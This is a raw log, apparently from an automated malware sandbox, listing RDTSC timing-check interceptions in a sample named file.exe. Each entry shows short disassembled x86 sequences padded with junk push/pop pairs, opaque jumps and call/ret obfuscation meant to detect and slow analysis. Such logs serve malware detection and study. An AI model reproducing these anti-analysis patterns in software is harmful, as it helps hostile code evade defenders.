Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5EF08 second address: B5EF17 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F08C0C91956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5EF17 second address: B5EF54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F08C0CB4536h 0x00000009 jne 00007F08C0CB4526h 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F08C0CB452Fh 0x00000018 push eax 0x00000019 push edx 0x0000001a jnp 00007F08C0CB4526h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5EF54 second address: B5EF58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5EF58 second address: B5EF5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5EF5C second address: B5EF68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F08C0C91956h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5EF68 second address: B5EF83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F08C0CB4535h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5F369 second address: B5F36D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5F36D second address: B5F377 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5F66E second address: B5F673 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5F78D second address: B5F792 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5F792 second address: B5F7B3 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F08C0C9195Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F08C0C91974h 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 jp 00007F08C0C91956h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5F7B3 second address: B5F7BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5F7BC second address: B5F7C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5FBB2 second address: B5FBEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0CB4537h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jng 00007F08C0CB4526h 0x00000011 jmp 00007F08C0CB452Fh 0x00000016 jnp 00007F08C0CB4526h 0x0000001c popad 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5FBEE second address: B5FBF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5FDAC second address: B5FDBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F08C0CB452Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B36AAA second address: B36AB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B36AB0 second address: B36AB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B604C3 second address: B604C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B60641 second address: B60679 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F08C0CB453Fh 0x00000008 jmp 00007F08C0CB4539h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jp 00007F08C0CB4526h 0x00000019 jmp 00007F08C0CB452Bh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B60679 second address: B60696 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0C91969h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6081C second address: B60821 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B60821 second address: B6085C instructions: 0x00000000 rdtsc 0x00000002 jne 00007F08C0C91971h 0x00000008 jne 00007F08C0C91956h 0x0000000e jmp 00007F08C0C91965h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F08C0C91966h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6085C second address: B60860 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B609CD second address: B609EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F08C0C91967h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6245A second address: B6245E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B643C7 second address: B643CD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B643CD second address: B643D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B643D2 second address: B643F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F08C0C91964h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B643F3 second address: B643F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B64A00 second address: B64A04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6EDC3 second address: B6EDC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6EDC7 second address: B6EDE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F08C0C91967h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6EDE4 second address: B6EDEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F08C0CB4526h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6EDEE second address: B6EDF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6EDF2 second address: B6EE11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F08C0CB4531h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pushad 0x00000011 popad 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6EF4F second address: B6EF53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6EF53 second address: B6EF70 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jg 00007F08C0CB4526h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pushad 0x00000010 popad 0x00000011 pop edi 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push edi 0x00000016 pushad 0x00000017 popad 0x00000018 pop edi 0x00000019 push eax 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c pop eax 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6F43C second address: B6F472 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F08C0C91967h 0x00000008 jl 00007F08C0C91956h 0x0000000e jl 00007F08C0C91956h 0x00000014 popad 0x00000015 push eax 0x00000016 jo 00007F08C0C91956h 0x0000001c pop eax 0x0000001d pop edx 0x0000001e pop eax 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6F472 second address: B6F478 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6F478 second address: B6F47D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6F47D second address: B6F489 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F08C0CB4526h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B70C58 second address: B70C5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B70E3D second address: B70E56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0CB4535h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B70E56 second address: B70E6C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F08C0C9195Ch 0x00000008 jl 00007F08C0C91956h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B70E6C second address: B70E72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B70E72 second address: B70E77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B70E77 second address: B70E8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F08C0CB4534h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B71028 second address: B7102D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7208E second address: B72098 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F08C0CB4526h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B72098 second address: B7209C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B730F3 second address: B730F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7296E second address: B72972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B730F9 second address: B730FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B73CB4 second address: B73CB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B73A24 second address: B73A28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B73CB9 second address: B73CD2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 je 00007F08C0C91956h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F08C0C9195Ah 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B73CD2 second address: B73D2B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007F08C0CB4528h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 00000017h 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 push 00000000h 0x00000025 pushad 0x00000026 push edi 0x00000027 mov ax, A92Eh 0x0000002b pop ebx 0x0000002c clc 0x0000002d popad 0x0000002e push 00000000h 0x00000030 pushad 0x00000031 mov dword ptr [ebp+122D1FA1h], edi 0x00000037 jmp 00007F08C0CB452Fh 0x0000003c popad 0x0000003d xchg eax, ebx 0x0000003e push edx 0x0000003f push edi 0x00000040 pushad 0x00000041 popad 0x00000042 pop edi 0x00000043 pop edx 0x00000044 push eax 0x00000045 pushad 0x00000046 push eax 0x00000047 push edx 0x00000048 push edi 0x00000049 pop edi 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B75B98 second address: B75BB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F08C0C9195Bh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7B22C second address: B7B261 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F08C0CB452Ch 0x00000008 je 00007F08C0CB4526h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 push 00000000h 0x00000013 movsx ebx, cx 0x00000016 push 00000000h 0x00000018 sub bx, C70Bh 0x0000001d mov bh, F1h 0x0000001f xchg eax, esi 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F08C0CB4532h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7B261 second address: B7B295 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jmp 00007F08C0C91969h 0x00000011 popad 0x00000012 pushad 0x00000013 jmp 00007F08C0C9195Bh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7C1F0 second address: B7C1F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7C1F4 second address: B7C1FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7C1FA second address: B7C200 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7C200 second address: B7C204 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B764E5 second address: B764F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F08C0CB4530h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7E217 second address: B7E28E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0C9195Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a ja 00007F08C0C91964h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007F08C0C91958h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 0000001Ch 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d clc 0x0000002e push 00000000h 0x00000030 mov bh, 3Eh 0x00000032 xchg eax, esi 0x00000033 pushad 0x00000034 jmp 00007F08C0C91963h 0x00000039 jmp 00007F08C0C9195Ch 0x0000003e popad 0x0000003f push eax 0x00000040 pushad 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7E28E second address: B7E297 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7C447 second address: B7C44C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7C44C second address: B7C45F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F08C0CB452Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B800A4 second address: B800A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B800A8 second address: B800AE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B811A0 second address: B811EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov dword ptr [esp], eax 0x00000008 movsx ebx, di 0x0000000b push 00000000h 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007F08C0C91958h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 0000001Dh 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 xchg eax, esi 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F08C0C91963h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B811EA second address: B81212 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0CB452Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F08C0CB4535h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B81212 second address: B81227 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0C91961h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B81227 second address: B81231 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F08C0CB4526h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B823DB second address: B823F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0C91963h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B823F2 second address: B823F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B823F9 second address: B82474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edi 0x00000009 jmp 00007F08C0C91969h 0x0000000e pop edi 0x0000000f nop 0x00000010 call 00007F08C0C9195Eh 0x00000015 clc 0x00000016 pop ebx 0x00000017 push 00000000h 0x00000019 mov di, D141h 0x0000001d push 00000000h 0x0000001f mov edi, ebx 0x00000021 call 00007F08C0C91966h 0x00000026 mov edi, dword ptr [ebp+12467B75h] 0x0000002c pop edi 0x0000002d push eax 0x0000002e pushad 0x0000002f jng 00007F08C0C9195Ch 0x00000035 jo 00007F08C0C91956h 0x0000003b pushad 0x0000003c jmp 00007F08C0C9195Fh 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B81383 second address: B81421 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 mov ebx, 0DC10024h 0x0000000d push dword ptr fs:[00000000h] 0x00000014 or dword ptr [ebp+122D3915h], esi 0x0000001a mov dword ptr fs:[00000000h], esp 0x00000021 or dword ptr [ebp+1244A609h], edi 0x00000027 mov eax, dword ptr [ebp+122D06B1h] 0x0000002d push 00000000h 0x0000002f push edi 0x00000030 call 00007F08C0CB4528h 0x00000035 pop edi 0x00000036 mov dword ptr [esp+04h], edi 0x0000003a add dword ptr [esp+04h], 00000014h 0x00000042 inc edi 0x00000043 push edi 0x00000044 ret 0x00000045 pop edi 0x00000046 ret 0x00000047 call 00007F08C0CB452Dh 0x0000004c mov dword ptr [ebp+12467EBCh], ebx 0x00000052 pop edi 0x00000053 push FFFFFFFFh 0x00000055 push 00000000h 0x00000057 push eax 0x00000058 call 00007F08C0CB4528h 0x0000005d pop eax 0x0000005e mov dword ptr [esp+04h], eax 0x00000062 add dword ptr [esp+04h], 0000001Dh 0x0000006a inc eax 0x0000006b push eax 0x0000006c ret 0x0000006d pop eax 0x0000006e ret 0x0000006f ja 00007F08C0CB4529h 0x00000075 mov dword ptr [ebp+12459DD3h], eax 0x0000007b nop 0x0000007c push eax 0x0000007d push edx 0x0000007e push eax 0x0000007f push edx 0x00000080 jnp 00007F08C0CB4526h 0x00000086 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B81421 second address: B8142B instructions: 0x00000000 rdtsc 0x00000002 jp 00007F08C0C91956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B8142B second address: B8144B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0CB4531h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007F08C0CB4526h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B8144B second address: B81451 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B8258D second address: B825A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F08C0CB4528h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B825A2 second address: B825A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B825A6 second address: B825AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B84447 second address: B844B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F08C0C9195Ah 0x00000009 popad 0x0000000a push esi 0x0000000b jng 00007F08C0C91956h 0x00000011 pop esi 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 pushad 0x00000016 push eax 0x00000017 pop eax 0x00000018 push edi 0x00000019 pop edi 0x0000001a popad 0x0000001b pop eax 0x0000001c nop 0x0000001d and bl, 00000001h 0x00000020 mov edi, dword ptr [ebp+122D1E82h] 0x00000026 push 00000000h 0x00000028 mov ebx, dword ptr [ebp+122D33C3h] 0x0000002e push 00000000h 0x00000030 mov ebx, 23B06152h 0x00000035 xchg eax, esi 0x00000036 jmp 00007F08C0C91968h 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F08C0C91968h 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B844B7 second address: B844BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
